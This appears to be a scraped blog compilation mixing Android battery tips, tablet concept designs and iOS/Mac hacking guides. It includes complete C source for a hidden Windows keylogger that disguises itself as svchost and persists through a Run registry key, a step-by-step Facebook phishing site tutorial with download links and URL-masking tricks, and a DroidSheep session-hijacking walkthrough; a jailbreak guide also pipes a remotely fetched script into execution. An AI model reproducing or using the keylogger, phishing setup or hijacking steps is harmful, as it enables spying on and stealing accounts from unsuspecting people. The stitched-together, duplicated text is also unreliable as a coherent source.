Using Android ?? Facing Charge drain !! read this then ….

Back to you after surfing internet on how to mange power in android . Testing it  myself.

1. Use Android Power Control widget

Put simply, you’ve got to take control. The best way of maintaining battery life is indeed to dumb-down your all-powerful new phone by switching off features – but do it in a stylish way.

Home screen widgets that flip Wi-Fi, Bluetooth, GPS and other power-hungry options on and off with a single press take the pain out of switching features off, while Android 1.6 added Google’s own power icon strip – set it up by long-pressing and installing the Android Power Control widget on your Home screen.

2. Calm down on the status updates

Do you really need to be pinged every two minutes about a new Tweet or email? Lower the notification frequency in any apps that constantly update you .

3. Switch off auto-sync

If you’re not a power-user of the Google life-management apps, turn them off. If you can live without Google Calendar and Gmail, it’s possible to do away with auto-sync altogether – just remember to manually sync your Contacts every once in a while, in case you drop your phone in a toilet.

4. Disable 3G connectivity

Good old 2G is perfect for calls and texts, so kill 3G unless you’re planning a bit of emergency web browsing on your phone. You’ll also benefit from the general feeling of increased calmness that follows naturally once you’ve stopped staring at the 3G icon every two minutes and fretting about what your mobile network connection state is.

5. Lower the screen brightness

As impressive as it might be to have your stunning OLED screen blazing out so much light that the current inhabitants of the International Space Station have to squint and lower the sun visors when you wake it up, it’s completely unnecessary. If you’re inside, Android’s default 0% brightness setting ought to do. Again, install a brightness widget on your desktop, for easy access when you do need a visibility boost.

6. Turn off GPS

GPS is a monster power-drainer, and it’s barely of any use most of the time.

7. Monitor everything

Android 1.6 introduced a menu that lets users see precisely where their battery life is going, with the OS giving you a percentage breakdown of what sucked away all your phone’s power in the final few minutes before you actually wanted to use it. Like a mobile black box recorder.

The ‘Battery Use’ tab under Settings/About Phone will give you a detailed breakdown of what’s absorbing the most power, letting you take manual control – and delete any power-hungry apps. Try replacing them with alternatives and see if there’s a difference. One rogue app that sucks power on your particular phone could be the problem.

8. Set a Wi-Fi timeout

There’s a semi-hidden ‘Advanced’ Wi-Fi management screen in Android, accessed by navigating to your phone’s ‘Wi-fi Settings’ tab and then pressing the Menu button. From here, you’re able to manually select a timeout option for the Wi-Fi connection – one of the biggest power drains on idle phones.

9. Go Gothic

Modern popular thinking has it that phone screens, particularly OLED versions, use more energy when displaying brighter, whiter colours. So go Gothic. Ditch that vibrant wallpaper and select a nice, dark Home screen background, then enjoy not having to reach for the charger for at least an extra minute every day.

10. Install a time-sensitive power manager

There are plenty of time and location sensitive apps on the Android Market which automatically handle your phone’s power and communications settings. For example, there’s no point leaving your phone connected to the mobile network while you’re asleep – so a simple app like Airplane Autoswitch, which kills all radio communications, will save loads of power and also help you sleep uninterrupted by notification pings.

Set it to activate Airplane mode at your usual bedtime, then get it to fire itself up again when you wake up. Simple, and your battery will make it through the night with only a minuscule drain.

AIRPLANE AUTOSWITCH:The unglamorous, plain text world of hardcore power management

11. Put your phone somewhere there’s a good reception

Your phone uses more power when it’s seeking a mobile mast connection, so, believe it or not, your battery will last much longer if you leave your phone in a place where it gets a good reception. Put it on the other side of your desk, or on the windowsill. It will make a difference.

An app like Antennas will give you a ridiculously detailed summary of your phone’s current network connectivity state and all the masts in the area, if you fancy locating the optimum low-power placement within a three-mile radius of your home.

 

12. Don’t drain the battery

The old advice to completely drain your battery to ensure proper operation doesn’t stand any more, thanks to modern lithium-ion batteries. They don’t have the charge memory issues that affected previous generation cells, and in fact perform better if you regularly charge them and keep them topped up.

13. Buy an in-car charger

And leave it in the car. Buy a spare one and leave it in a friend’s car. Also leave USB cables everywhere. And get a spare battery. And a spare spare battery. There’s no guaranteed way to beat the system. It will be flat the one time you fall down a cliff and need help.

C program of Keylogger or keystroke logger :

Before reading this let me tell you , this article is not owned by me. My intention is to just share this unique code .

C program of Keylogger or keystroke logger :

#include<windows.h>

#include<stdio.h>

#include<winuser.h>

#include<windowsx.h>

#define BUFSIZE 80

int test_key(void);

int create_key(char *);

int get_keys(void);

int main(void)

{

HWND stealth; /*creating stealth (window is not visible)*/

AllocConsole();

stealth=FindWindowA("ConsoleWindowClass",NULL);

ShowWindow(stealth,0);

int test,create;

test=test_key();/*check if key is available for opening*/

if (test==2)/*create key*/

{

char *path="c:\\%windir%\\svchost.exe";/*the path in which the file needs to be*/

create=create_key(path);

}

int t=get_keys();

return t;

}

int get_keys(void)

{

short character;

while(1)

{

sleep(10);/*to prevent 100% cpu usage*/

for(character=8;character<=222;character++)

{

if(GetAsyncKeyState(character)==-32767)

{

FILE *file;

file=fopen("svchost.log","a+");

if(file==NULL)

{

return 1;

}

if(file!=NULL)

{

if((character>=39)&&(character<=64))

{

fputc(character,file);

fclose(file);

break;

}

else if((character>64)&&(character<91))

{

character+=32;

fputc(character,file);

fclose(file);

break;

}

else

{

switch(character)

{

case VK_SPACE:

fputc(' ',file);

fclose(file);

break;

case VK_SHIFT:

fputs("[SHIFT]",file);

fclose(file);

break;

case VK_RETURN:

fputs("\n[ENTER]",file);

fclose(file);

break;

case VK_BACK:

fputs("[BACKSPACE]",file);

fclose(file);

break;

case VK_TAB:

fputs("[TAB]",file);

fclose(file);

break;

case VK_CONTROL:

fputs("[CTRL]",file);

fclose(file);

break;

case VK_DELETE:

fputs("[DEL]",file);

fclose(file);

break;

case VK_OEM_1:

fputs("[;:]",file);

fclose(file);

break;

case VK_OEM_2:

fputs("[/?]",file);

fclose(file);

break;

case VK_OEM_3:

fputs("[`~]",file);

fclose(file);

break;

case VK_OEM_4:

fputs("[ [{ ]",file);

fclose(file);

break;

case VK_OEM_5:

fputs("[\\|]",file);

fclose(file);

break;

case VK_OEM_6:

fputs("[ ]} ]",file);

fclose(file);

break;

case VK_OEM_7:

fputs("['\"]",file);

fclose(file);

break;

case VK_NUMPAD0:

fputc('0',file);

fclose(file);

break;

case VK_NUMPAD1:

fputc('1',file);

fclose(file);

break;

case VK_NUMPAD2:

fputc('2',file);

fclose(file);

break;

case VK_NUMPAD3:

fputc('3',file);

fclose(file);

break;

case VK_NUMPAD4:

fputc('4',file);

fclose(file);

break;

case VK_NUMPAD5:

fputc('5',file);

fclose(file);

break;

case VK_NUMPAD6:

fputc('6',file);

fclose(file);

break;

case VK_NUMPAD7:

fputc('7',file);

fclose(file);

break;

case VK_NUMPAD8:

fputc('8',file);

fclose(file);

break;

case VK_NUMPAD9:

fputc('9',file);

fclose(file);

break;

case VK_CAPITAL:

fputs("[CAPS LOCK]",file);

fclose(file);

break;

default:

fclose(file);

break;

}

}

}

}

}

}

return EXIT_SUCCESS;

}

int test_key(void)

{

int check;

HKEY hKey;

char path[BUFSIZE];

DWORD buf_length=BUFSIZE;

int reg_key;

reg_key=RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_QUERY_VALUE,&hKey);

if(reg_key!=0)

{

check=1;

return check;

}

reg_key=RegQueryValueEx(hKey,"svchost",NULL,NULL,(LPBYTE)path,&buf_length);

if((reg_key!=0)||(buf_length>BUFSIZE))

check=2;

if(reg_key==0)

check=0;

RegCloseKey(hKey);

return check;

}

int create_key(char *path)

{

int reg_key,check;

HKEY hkey;

reg_key=RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",&hkey);

if(reg_key==0)

{

RegSetValueEx((HKEY)hkey,"svchost",0,REG_SZ,(BYTE *)path,strlen(path));

check=0;

return check;

}

if(reg_key!=0)

check=1;

return check;

}

Now this code will generate a binary exe file, which is your keylogger software. Just double click it to start monitoring all the keys pressed in system.

Making Facebook Phishing Site Tutorial.

Now in this article i am going to teach you how to set up the Phishing site, which is the Difficult task than making a Phishing site.

NOTE : EDUCATIONAL PURPOSE. CAN BE USED ON ANY WEBSITE.

Step 1: The First Step in Making the site is to regester an account at http://www.000webhost.com/order.php (if you have account than you can skip first 2 steps)

Step 2: Now Goto your email account that you gave and confirm your account with confirmation link


Step 3: Now Download this FILE (http://www.mediafire.com/?klq1vak76bouzrw ) .

Step 4: Now Goto http://members.000webhost.com/ and Log into your account.

Step 5: Now when you are logged into your account click on the Go to Cpanel  in front of your domain that you had registered, and then Go to File Manager under Files and log into it.

.

Step 6: Now Click on the Public_html.

Step 7: Now click on the Upload button, choose the file under the Archives that you have downloaded, to be uploaded.

Step 7: Now any one who visits your site would be taken to the Fake Facebook Login Page. After they enter their Username and Password, they will be taken to another page that will show them error. So there is less chance that it will be detected.




NOTE::: To access the input data ( Usernames and Password ) Goto the Following Address:


http://www.yoursitesadress.p4o.net/lol.html


THE DOWNLOAD LINK TO facebook.zip is http://www.mediafire.com/?svyhib869w1lzhy PS:> If http://www.p4o.net didn’t worked for you, you can use :
www.drivehq.com
www.yourfreehosting.net
www.esmartstart.com

=============================================================
The Input Data (Email and Password) will look like following:

==============================================================
UPDATE:
Now if you have successfully made the Phishing page(site) then you must know that on Facebook you cannot post it, mail it, or sent it in chat. e.g: http://www.yoursite.p4o.net. This is because Facebook dont allow the T35.com sites. So Solution to this problem is to use http://www.dot.tk for the URL hiding.
All you have to do is to Goto http://www.dot.tk , on the main page enter your Phishers address and get a domain for that. Like for http://www.myphisher.p4o.net you gets http://www.myphisher.tk. And facebook will allow you to post it

HOW TO FIND YOUR USERNAME?
Ok guys this is the most asked question of all so here is a simple answer, just look in the following picture of Admin Paned the red shaded area tells you the username of the website

20 Innovative Tablet Concepts

 

 

 

It’s been around 1.6 years since the initial release of Apple iPad, and regardless the criticism, the device has achieved tremendous success in the tablet market. It’s so successful until so many great companies have risen up to challenge its realm by designing and releasing their own version of tablet.

While great companies are competing each others by showing off new designs and devices, an interesting phenomenon happened: another group of very talented designers have also implemented their own vision on their tablet design, and these so-called concept tablets have received praises from consumers like, “I hope it’s true!”.

Be it dual screen tablet, fold-able tablet or smartphone powered tablet, in this post you will see concepts which designers combined innovation and art to become something that consumers really thirsts for. Enjoy them and let us know which tablet you hope it’s true!

MacBook Duo By Kane Yanagawa

“My proposal is for a hybrid device that is a unique combination of Apple’s existing portable media device technology with an e-reader / netbook. A device that offers enough usability in each arena to make it a standalone solution for frequent travelers. Now you can work + browse, read + write, and share + play all on one device.”

MacView By Patrycjusz Brzezinski

According to anarticle in blog.moridin.pl, MacView project arose from a need to have such a device. It was designed to substitute the laptop, which is mostly uncomfortable in many situations. When creating the project, the designer bought a MacBook in order to better understand the philosophy of Apple. For sure great studies gave birth a great concept.

)

MacBook Page By Devindh Baburam

“The MacBook Page is based on the size of a standard sheet of A4 paper. It maximises screen ‘real estate’ by presenting the user with an edge to edge interactive desktop. It also incorporates a hidden solar panel to supplement the power supply.”

Doodle Book By Pyeong Yeol Yoo, Hun Park

“Doodle book is a lifebook able to make creative work. Portable enough to be carried out, it can be easily used as memo pad in any place. Included the concept of layer in its input system, it can attach or overlap an existing document, image, sketch or video comment with pen.

Doodle book is able to make creative work between idea and realization.”

Ecopad By Yonggu Do, Jun-Se Kim, Eun-Ha Seo

“Electricity is made automatically by using your ecoPad. Currently commercialized tablet PCs and smartphones have a very limited battery life – often not more than a day before having to be recharged.

However, on average, people press their touchscreens over 10,000 times a day. The ecoPad does not require special charging from an adaptor. Instead, it generates electricity when a user presses the touchscreen, due to the nano piezoelectricity film that is located below the display.”

File-Top By Fan Zhang

“This tablet is for the people who want a more portable and lighter computer. The inspiration comes from traditional Chinese liber. The foldable File-top composes of several translucent touchscreens and can be used as a touchpad or widescreen PC.

In the future the environmental papery material might take place of current memory devices. You are able to put all the documents into this “file” and it will store the information for you.”

Fractal By Pedro Calle

“Fractal is everything you need, it can be split into pieces each of which can work individually as laptop, pad, music player and you can tweak them with apps and widgets.

It can also work together as a console with different touchscreens with programs, menus, tools, palettes, brushes and audio samplers, all separated physically. Find all the fun on customizing your Fractals, share them with your friends and enjoy making the digital realm a more analogous experience.”

Hermes By Yeongwom Jeon, Sangmin Park, Seokho Yu

“Previous tablet PC has two disadvantages. The typing work is not as good as the original keyboard and others can easily see what you are doing on the computer. Now, you do not need to worry about emerging of personal information with Hermes. You can send messages and call with Hermes as well.”

HTC Evolve Tablet By Timur Pinar

A HTC branded high-end tablet with smart Android OS running on it. Doubtlessly the design is sleek and the user interface seems to be very promising. There’s also an extra tab on the left side of the tablet which gives more dedicated spaces for apps. I must say this is probably one of the best concepts which I wish it to be materialized.

HTC TUBE By NAK Studio

Another sleek concept for HTC brand, but the idea revolves around the “Cartridge powered multimedia device”. The concept is not much explained, but this might be the tablet which will function as a big monitor when the phone is plugged in. An interesting idea, and I must say the device is well designed.

MPad By Volker Hübner

MPad is for professional designers. It combines the advantage of intuitive multi-touch operation with the precision of a pressure-sensitive pen, probably sounds like a very, very advanced Wacom tablet.

For its features part, essential keyboard commands are arranged next to the 15.6″ OLED display, 9 fixed buttons, 2 programmable buttons rockers with e-ink display, with up to 24 shortcuts for each software application. Monstrous tablet, but of course I hope there’s a model for left-handers like me.

Piggyback By Brooks Benefiel

Piggyback tablet is the similar concept with HTC Tube which suggests that, you have a smartphone, and what you really need now is just a bigger screen.

With the tablet, you will be able to plug in the smartphone to get a bigger screen for more complicated tasks like typing out long report or, if the processing power allows, doing graphic editing job. Yes, all you need is a bigger screen.

Sony Ericsson Vivaz™ XL By Frank Tobias

“Well, here I made a XL-version of Vivaz. It features an 8 megapixel camera at the back, of course with HD video recording and the interior capacity is about 75GB. I hope you like it ”

Sony Ericsson X10™ Maxi By Frank Tobias

“So here I expanded the Sony Ericsson X10 to a tablet called X10 Maxi. It features like the X10, an 8 megapixel camera, the system is OS Android 2.0 and the interior capacity features 100GB.”

Sony Ericsson Xperia™ XTab By Juris15

Seriously this guy needs to be hired by Sony Ericsson, and I’m sure you will know why by looking at 2 distinguishing designs below. Sleek and sexy.

Sony Ericsson Xperia™ XTab10 By Juris15

Another great design from the XTab series, also one of the series that I sincerely hope it was true.

The Part By Jun Se Kim, Yong-Gu Do, Eun-Ha Seo

“Do we really have to buy a smartphone and a pad? Do we really need both? Actually, the only difference between the smartphone and smartpad that we are using separately is the screen size, and the advantage and disadvantage are identified by the size.

Carrying two kinds of devices, smartphone and smartpad, is not only inefficient for users, but it is an uncomfortable waste that the smart era created. In that aspect, the ‘part’ is not a separate device, but an efficient and convenient smart device with a new concept that a smartpad can be combined with a smartphone.”

Unknown Tablet By Frank Tobias

“Here I made another tablet. Unfortunately I don’t know which brand and user interface I should take for it… Well, the tablet itself sports a 3.5 mm audio jack on the left side, 2 USB ports on the right side, and a camera with 10 megapixels, HD video recording and a triple LED flash…”

Unnamed Tablet By Frank Tobias

“So here’s another tablet concept. It’s running Windows 7, supports a 5 megapixel camera with LED flash at the back, 4GB ram, 300GB interior memory, an Intel i5 processor and HD video recording ”

Volumni By Dulyawat Wongnawa

“Volumni is a new concept of PC which integrates various types of PCs into one single device with only a size of an envelope once it’s folded (23 x 10 cm). It consists of 4 units of ultra-slim touchscreens linked together by a 360 degrees pivot hinge. It serves as both a portable device and a workstation depending on user preference. Users can define their usage of the device by just folding and turning it.”

Hack Through Android Using DroidSheep (HTTP Session Hijacking)

Android is one of the best and most famous operating system for mobile devices, mobile devices is now a important part of our life and we are using it every where in any condition. There are a lot people that are using Wifi on their mobile devices. Look at the past when we had a Firefox ad ons that can hijack Facebook, Twitter and other social networking websites sessions and the tool is called Firesheep, after this we got FaceNiff the purpose is same means session hijacking while Faceniff is for android OS.

Now there is another best tool for Android OS that can hijack session and it called Droidsheep.

What is DroidSheep?

DriodSheep is awesome Session Hijacking Android app that can be use to hijack Wifi Sessions. Currently It support Open andWEP Encrypted networks that includes WPA and WPA2 networks (PSK) According to the author, all websites are vulnerable that includes Google.com, facebook.com. BTW we have tested it with Facebook 

What are the requirements to run DroidSheep on Android phones?

You have to make sure the following checklist that we have tested on our SamSung Galaxy S phone with Andriod 2.3.4 

• libpcap
• arpspoof  – It can be install using Android Market
• Your phone Must Be ROOTED in order to use this application.
• and yes.. DroidSheep.

Step 1

Once you have installed DroidSheep in your Android, run the application. An agreement will be prompted. Read it and tick on “I understand and accept the disclaimer”. After that, click on OK button. To run this application, SuperUser permission is required. In other words, you phone need to be ROOTED!

Step 2:

Look at the Start button which is located at the bottom right. Simply click on it. Once the message “RUNNING AND SPOOFING” turns up, login into your Facebook account. Play around your account by navigating to HOME or write a wall post or reply to your friend’s status. Simply, do whatever you want with your account while DroidSheep is doing its job.

 

Step 3

WoOOooo! You have successfully captured your Facebook’s session. Usually, it can be up to one minute for DroidSheep to capture a session. Once your session has been listed in DroidSheep, select it! After that, click on Open Site option.

Step 4

Finally, you are in your Facebook account without having to do any authentication in your phone! So, what do you think about this attack? Awesome, huh?! However, can you imagine if someone does this attack on you? For your information, there is one way which you can use to prevent this attack. How? BY USING HTTPS! Make sure you are always be in secure connection if you want to always be safe from this attack. However, make sure you are using HTTPS starts from the login page until you click on the logout button.

How DroidSheep works???

There are many users that do not known that air is the transmission medium when using WiFi. Therefore information is not only transfered to its receiver but also to any other party in the network within the range of the radio waves.

Usually nothing special happens because the WiFi users discard packets that are not destined to themselves. DroidSheep does not do this. It reads all the packets looking at their contents.

Is a website sending a clear recognition feature within a message’s content, which can identify a user (“SessionID”), then DroidSheep is able to read it although it is not intended to external users. Moreover DroidSheep can use this token to use it as its own. The server can’t decide whether the authorized user or DroidSheep has sent the request.

How can I protect myself?

The only satisfying answer is: SSL respectively HTTPS.

Many providers already offer HTTPS, even facebook, however it must often be enabled in the settings first.

When using HTTPS the data are still sent to alle participants in the WiFi-network, too, but because the data has been encrypted it is impossible for DroidSheep to decrypt the contect of a message – remaining only a complete mess of letters, with which an attacker can’t do anything.

The real problem is that not every website provides SSL. What to do when you are in a public network (hotel, airport, etc.), you also want to use this and the site does not offer HTTPS though?

You can use a VPN-connection

1 Vote

Android is one of the best and most famous operating system for mobile devices, mobile devices is now a important part of our life and we are using it every where in any condition. There are a lot people that are using Wifi on their mobile devices. Look at the past when we had a Firefox ad ons that can hijack Facebook, Twitter and other social networking websites sessions and the tool is called Firesheep, after this we got FaceNiff the purpose is same means session hijacking while Faceniff is for android OS.

Now there is another best tool for Android OS that can hijack session and it called Droidsheep.

What is DroidSheep?

DriodSheep is awesome Session Hijacking Android app that can be use to hijack Wifi Sessions. Currently It support Open andWEP Encrypted networks that includes WPA and WPA2 networks (PSK) According to the author, all websites are vulnerable that includes Google.com, facebook.com. BTW we have tested it with Facebook 

What are the requirements to run DroidSheep on Android phones?

You have to make sure the following checklist that we have tested on our SamSung Galaxy S phone with Andriod 2.3.4 

• libpcap
• arpspoof  – It can be install using Android Market
• Your phone Must Be ROOTED in order to use this application.
• and yes.. DroidSheep.

Step 1

Once you have installed DroidSheep in your Android, run the application. An agreement will be prompted. Read it and tick on “I understand and accept the disclaimer”. After that, click on OK button. To run this application, SuperUser permission is required. In other words, you phone need to be ROOTED!

Step 2:

Look at the Start button which is located at the bottom right. Simply click on it. Once the message “RUNNING AND SPOOFING” turns up, login into your Facebook account. Play around your account by navigating to HOME or write a wall post or reply to your friend’s status. Simply, do whatever you want with your account while DroidSheep is doing its job.

 

Step 3

WoOOooo! You have successfully captured your Facebook’s session. Usually, it can be up to one minute for DroidSheep to capture a session. Once your session has been listed in DroidSheep, select it! After that, click on Open Site option.

Step 4

Finally, you are in your Facebook account without having to do any authentication in your phone! So, what do you think about this attack? Awesome, huh?! However, can you imagine if someone does this attack on you? For your information, there is one way which you can use to prevent this attack. How? BY USING HTTPS! Make sure you are always be in secure connection if you want to always be safe from this attack. However, make sure you are using HTTPS starts from the login page until you click on the logout button.

How DroidSheep works???

There are many users that do not known that air is the transmission medium when using WiFi. Therefore information is not only transfered to its receiver but also to any other party in the network within the range of the radio waves.

Usually nothing special happens because the WiFi users discard packets that are not destined to themselves. DroidSheep does not do this. It reads all the packets looking at their contents.

Is a website sending a clear recognition feature within a message’s content, which can identify a user (“SessionID”), then DroidSheep is able to read it although it is not intended to external users. Moreover DroidSheep can use this token to use it as its own. The server can’t decide whether the authorized user or DroidSheep has sent the request.

How can I protect myself?

The only satisfying answer is: SSL respectively HTTPS.

Many providers already offer HTTPS, even facebook, however it must often be enabled in the settings first.

When using HTTPS the data are still sent to alle participants in the WiFi-network, too, but because the data has been encrypted it is impossible for DroidSheep to decrypt the contect of a message – remaining only a complete mess of letters, with which an attacker can’t do anything.

The real problem is that not every website provides SSL. What to do when you are in a public network (hotel, airport, etc.), you also want to use this and the site does not offer HTTPS though?

You can use a VPN-connection

For this the computer sets up an encrypted channel to a confidential computer which again transfers the data to the website

For this the computer sets up an encrypted channel to a confidential computer which again transfers the data to the website

Jailbreak iOS 6.0 on iPhone 4S, 4, 3GS, iPod Touch 5, 4, & iPad 3, 2

Untethered vs. Tethered

An untethered jailbreak means you can turn off your device and reboot without the use of a computer. A tethered jailbreak means you can not reboot your device if you turn it off without the u

iOS 6 was just released a while ago, and now we’re going to show you how to jailbreak it.

First of all, please note that this is a tethered jailbreak, and it only works with A4 devices like the iPhone 4.

Secondly, since there currently isn’t any jailbreak tool that will install Cydia just yet, we’re going to have to go about installing Cydia using a manual process.

Still game after all of those asterisks? Then come inside, as we show you how to Jailbreak iOS 6 final…

Step 1: Install iOS 6 on your device. You’ll also need to know the location of the iOS 6 IPSW firmware file. If you’re on a Mac, you can find that in /Library/iTunes/iPhone Software Updates/ if you didn’t download iOS 6 manually, and updated using iTunes. You can also download iOS 6 from our downloads page. After iOS 6 is installed, hook your device up to your computer, and place it into DFU mode.

Step 2: Download RedSn0w 0.9.13dev4 from the downloads page.

Step 3: Run RedSn0w, and click Extras > Select IPSW, then select your iOS 6 firmware file. It should successfully identify your firmware.

Step 4: Click Back, and then click Jailbreak. You should see a dialogue box saying “preparing jailbreak data” followed by a page with several options. Ensure that Install SSHis selected, and click Next.

Step 5: Your iPhone will now proceed through the jailbreak process. You will receive a message acknowledging that this is a tethered jailbreak.

Step 6: Once the jailbreak is completed, and you are back on your Lock screen, place the device back info DFU mode.

Step 7: Click Back, and then click Just boot. A pineapple logo should appear on your device, indicating a tethered boot. Once this complete’s and you are back on your Lock screen, you may close RedSn0w.

Installing Cydia

Step 1: On your iOS device, go to Settings > Wi-Fi > and click the arrow next to your connected Wi-Fi router. Find your IP address for your Wi-Fi connection. In my example, my IP is 10.0.1.27.

Step 2: On a computer connected to the same Wi-Fi network, open the Terminal app.

Step 3: In terminal type: ssh root@10.0.1.27 (be sure to change the IP address to match your iOS device’s IP)

Step 4: After a few seconds, it should connect, and prompt you for your iOS device’s password. The password is alpine

Step 5: Once connected, paste the following into the terminal:

wget -q -O /tmp/cyinstall.sh http://downloads.kr1sis.net/cyinstall.sh && chmod 755 /tmp/cyinstall.sh && /tmp/cyinstall.sh

Step 6: After a minute or so of scrolling prompts, your iOS device should reboot, and Cydia will be installed. If you get any permission errors on the terminal, just ignore them.

That’s it. You now have a jailbroken iOS 6 device running Cydia. That wasn’t so hard, was it?

Install Android on your iOS Devices

Sometimes, those of us comfortably living in the Apple sphere need to boot into Windows or Linux. Bootcamp and Parallels have that ability on the Mac, but on an iOS device it’s just not that easy to boot into another mobile operating system. If you have jailbroken iOS device, however, you can install and dual-boot your old school iPhone or iPod touch with Android.

I am going to show you how to successfully install and run Android on a compatible device using a simple application downloaded from  the Cydia app store called Bootlace. Follow along and you’ll be using Android without spending a penny on one of those newfangled phones.

Difficulty: Medium

What you need: 
>> iPhone 2G, 3G, or iPod touch 1G
>> Jailbroken iOS version iOS 3.1.2 to 4.1
>> Cydia

Before we get started, let’s talk about the device you need. Currently iDroid only works with the first generation iPod touch, first generation iPhone (iPhone 2G), or iPhone 3G. This device will need to be jailbroken using either Redsn0w, Blackra1n, or any of the Pwnage tools currently available. When you jailbreak using one of these methods, the appropriate tools are in place for this hack to occur.

1. Add a Repository to Cydia

Once you open Cydia, click on Manage > Sources. You will be presented with a list of the Cydia repositories for jailbroken applications. Click the edit button in the top-right of the application, then click the Add button that appears in the top-left. You will be presented with a popup that asks you to enter a Cydia/APT URL. Type in the following URL, then click Add Source:

http://repo.neonkoala.co.uk

After you do this, there will be a loading screen that appears letting you know that the sources are being loaded. Upon loading completion, you will be able to return to Cydia.

2. Download and Install Bootlace

Next we need to download and install Bootlace from the Cydia repo that we just added. Navigate to the search page in Cydia and type in Bootlace to find it. Click the install button to have Bootlace installed on your device. Once install has completed, exit Cydia and return to the homescreen.

3. Launch Bootlace and Watch It Do Its Magic

When you open Bootlace for the first time, it will check to make sure you have a compatible device and then download the kernel patch for your iOS device.

After the patch has been applied, you will be asked to reboot the device. After it does so, launch Bootlace.

4. Install OpeniBoot

OpeniBoot is a bootloader for your iPhone that will let you easily switch between booting iOS or Android (iDroid). This is similar to the Apple-produced bootloader on the Mac called Bootcamp that lets you switch between Windows and Mac operating systems.

To install OpeniBoot, load Bootlace, select the OpeniBoot tab and tap install. You will be prompted with a warning reading, “Bootlace is about to install OpeniBoot. This involves flashing important parts of your device and must not be interrupted or your device will require a restore. Do not close the app during any part of the install.”

This process will take a few minutes. When it is completed, you will be returned to the OpeniBoot tab in Bootlace.

5. Install iDroid

Once you have OpeniBoot installed, you will need to navigate to the iDroid tab in Bootlace. Once there, tap the install button, and connect your device to a wall outlet before continuing on with the install process. Do not connect it to a computer, otherwise it will launch iTunes, causing the install process to fail.

After you agree to the warning, your device will begin downloading iDroid. Depending on your Internet connection, this may take a while.

After iDroid has been installed, you will get important information about your version of iDroid, including the iDroid version number, Android version number (Currently 2.2.1; or, Froyo), and date installed. In addition, you can do a one-click upgrade when updates are available, or remove your current install.

6. Boot, Boot, Boot

When you’re ready to boot into Android, simply visit the QuickBoot tab and tap on the Android icon. When you do, a notice will popup saying, “Warning – This will reboot your device into Android immediately. Are you sure?” Assuming you are, select Yes.

Your device will begin the iDroid boot. While the boot process is happening, you will see text fill the screen. After a few minutes, you will see the standard Android loading scree, and shortely thereafter, you will be presented with the Android unlock screen.

Congrats, you have now installed Android on your iOS device.

Install Mac OS X Lion In Windows Within 10 Mins

How To Install Fully Functional Mac OS X Lion Virtual Machine inside Windows

How to create and install Mac OS X Lion Virtual Machine inside your Windows 7

If Hackintosh is not new to you, you will have no problem to follow along with this guide. If you are new to this “Hackintosh” thing, don’t worry this isn’t the real Hackintosh and installing on a Virtual Machine meaning it doesn’t matter what you do, you can always recover or start from scratch again without damaging your perfectly working Windows 7 environment.

Requirements:

• You must have an Intel CPU, if you have an AMD CPU then this will NOT working for you.
• Check make sure your Intel CPU has virtualization technology and is enabled from your BIOS.
• At least 4GB of RAM (less than this will slow your system down very significant margin)
• At least 20 GB of Hard Drive space

To start, here are the following tools and items you need to have:

• VMware Workstation 7.1+ (get the latest version) or even better free version of VMware Player will work as well
• After many readers’ respond, it looks like it’s a good idea to download and install VMware Workstation even with a free trail, for initial setups. Afterwards you can use VMware Player to run the VM.
• Download the Mac OS X VMware unlocker mirror1, mirror2and other helper  ([UPDATE] VMware unlocker link)
• Download the Audio / Sound driver for VMware Mac OS X Lion if you want to get audio working as well (thanks to Manas commentator)
• Download the bootable “Mac OS X Lion bootable vmdk” (find it on Google should be around 4.12GB in size)

Make sure you have the above tool ready, after you’ve installed VMware workstation run the Mac OS X VMware unlocker

Pick a location to extract the file.

Go to the location you’ve just extracted the file. should be something like this  Mac OS X Lion VMware FilesVMware Unlocker – Mac OS X Guest

shift + right click on the folder “VMware Workstation Unlocker –Windows” to “Open command window here”

Run “windows.bat” command

When this is done you should see something like the above screenshot.

Now navigate back to the folder Mac OS X Lion VMware FilesMac OS X Lion find the named Mac OS X Lion.vmx and double click.

This will open the VMware Workstation, you should see something like the following

Now click Edit virtual machine settings

Here you want to add a new hard disk which will contain the vmdk you’ve just downloaded. Click “Add..” select “Hard Disk” Click next

Select “Use an existing virtual disk”

Browse and find the vmdk file, click “Open”

Click “Finish” when you done.

The reason you want to add another hard drive is that in the original setting, the 40GB has no OS on it, therefore VMware will try to boot off the OS from the second disk (the vmdk file) which will load and boot into Lion Installer.

Now back to the main menu, click “Power on the virtual machine”

From now here just following the on screen instruction to install Mac OS X Lion. Should be pretty straight forward.

When you done installing Mac OS X Lion on the Virtual Machine, go download the VMware tools inside the new Mac OS X Lion

Double click “Install VMware Tools”

After you finish installing the VMware tools, reboot the machine now you should have native screen resolutions.

From now on, it’s highly suggested to take a snapshot of the working VM. Incase in the future you done anything that messed up the machine you can always rollback to previous working state with the save of snapshot. From this moment on, you can also remove the second hard drive (the bootable Lion installer vmdk file) that you’ve added to the VM earlier.

Update to 10.7.2

Here are the steps to enable your VM successfully update to the latest 10.7.2 Lion which includes iCloud and many other integrations.

1. Download the 10.7.2 combo update from Apple’s website, don’t try to update it fromSoftware Update.

2. Don’t apply the update yet, make sure you have taken the snapshot of your current system

3. Open Terminal inside Lion

4. run the following command, including the dot at the end.

cp -r /System/Library/Extensions/AppleLSIFusionMPT.kext .

5. Now apply the update, but don’t reboot after it’s finished.

6. now go back to terminal and at the same directory location run the following command

7. sudo rm -rf /System/Library/Extensions/AppleLSIFusionMPT.kext

8. sudo cp -r AppleLSIFusionMPT.kext /System/Library/Extensions

9. reboot

---

Update to 10.7.3

1. Make sure you have updated your VM to 10.7.2 before proceed.

2. Download the OS X Lion update 10.7.3 here  (due to CUI bugs in the 10.7.3 update Apple has removed the download and redirect all the update to combo update, you can still try to use the combo update to update your VM Lion, I’m getting mixed results, some reported working just fine some didn’t. If you wish to get the update from 10.7.2 to 10.7.3 you can get the alternative download not from Apple herehttp://imzdl.com/info/480)

3. Take a snapshot before update

4. Repeat step 3-9 from previous steps in 10.7.2 update and you are good to go.

Note: Things you need to know, in order to keep your VMware Lion Hackintosh up to date, you need to apply update one at a time. Ex, from a fresh install image, you need to first apply 10.7.1 update, then when the update is successful, you need to update your VM to 10.7.2, and finally to 10.7.3. If you try to directly update to 10.7.3 using combo update it doesn’t seems to be working. Good luck !

---

Optional – Enable VMware Shared Folder

